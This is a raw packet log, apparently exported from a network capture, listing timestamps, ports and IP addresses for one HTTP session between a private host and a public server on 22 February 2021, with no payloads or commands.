Feb 22, 2021 09:14:50.279850960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279867887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279887915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279902935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279926062 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279936075 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.279972076 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.279975891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.279979944 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280002117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280018091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280040026 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280056000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280076981 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280092001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280114889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280123949 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280132055 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280133009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280136108 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280148983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280162096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280191898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280637980 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280658007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280682087 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280699015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280723095 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280735970 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280740976 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280742884 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280759096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280778885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280796051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.280807972 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.280812025 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.281282902 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303420067 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303462029 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303491116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303519011 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303546906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303574085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303580046 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303601980 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303630114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303653002 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303658009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303662062 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303685904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303714991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303740978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303770065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303797960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303847075 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303857088 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303857088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303863049 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.303910017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.303951025 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304012060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304038048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304053068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304114103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304160118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304212093 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304214001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304227114 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304258108 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304301977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304337978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304359913 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304373026 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304456949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304501057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304553986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304594994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304630041 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304639101 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304639101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304682016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304739952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304775953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.304847002 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.304857969 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328466892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328500986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328536034 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328561068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328584909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328617096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328640938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328665018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328665972 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328689098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328691959 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328697920 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328713894 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328737974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328737974 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328763008 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328787088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328798056 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328807116 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328814983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328839064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328862906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328886986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328888893 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328893900 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.328912020 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328937054 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328960896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.328978062 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329001904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329015017 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329020023 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329025984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329051018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329075098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329098940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329113960 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329121113 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329122066 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329125881 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329145908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329180002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329202890 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329205990 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329226971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329252005 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329283953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329308033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329308987 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329314947 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329332113 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329365015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329416037 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329425097 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.329955101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.329987049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330013990 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330044031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330080986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330108881 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330132008 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330136061 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330142975 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330166101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330194950 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330199003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330204964 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330224037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330250978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330279112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330306053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330315113 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330319881 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330334902 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330360889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330425978 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330430984 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.330894947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330926895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.330964088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331001043 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331029892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331067085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331094980 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331095934 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.331104994 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.331123114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331130981 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.331152916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331182003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331199884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.331234932 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.331239939 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.358329058 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358369112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358411074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358438015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358473063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358500957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358527899 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358550072 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.358566999 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.358587027 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.358591080 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.358623028 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.687205076 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.687225103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.687247992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.687259912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.687272072 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.687288046 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.687364101 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.687381029 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.687408924 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748039007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748070002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748096943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748116016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748135090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748158932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748178959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748198032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748218060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748234034 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748240948 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748250961 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748260975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748285055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748305082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748317957 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748322964 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748323917 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748342991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748392105 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748394966 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748410940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748431921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748450994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748475075 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748493910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748513937 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748529911 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.748569965 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.748574018 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.751323938 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781632900 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781661987 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781682968 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781702042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781732082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781749964 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781771898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781779051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781788111 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781800032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781822920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781841993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781843901 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781847954 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781860113 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781878948 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781898975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781898975 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781919003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781936884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.781987906 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.781992912 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782018900 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782041073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782059908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782080889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782099962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782133102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782136917 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782155037 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782157898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782157898 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782177925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782191992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782218933 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782222986 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782644987 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782666922 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782692909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782711983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782731056 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782738924 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782759905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782779932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782788038 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782793045 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782799006 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782818079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782841921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782859087 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782866955 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782870054 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782882929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782902956 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782922983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782941103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.782951117 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.782953978 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.783690929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.783713102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.783751011 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.783757925 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.805522919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805541039 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805566072 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805578947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805592060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805604935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805622101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805634975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805655956 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805660963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805674076 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805686951 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805694103 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.805706024 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.805706978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805721045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805737972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805778980 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.805788994 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.805919886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805941105 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805958033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805973053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.805989027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.806001902 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.806014061 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.806030035 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.806049109 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.806052923 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.806438923 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.806453943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.806514025 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.806521893 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.832386017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832417965 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832447052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832464933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832484007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832506895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832525969 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832547903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832551003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.832564116 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.832566023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832583904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832601070 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.832607031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.832631111 CET	80	49761	172.67.172.17	192.168.2.4
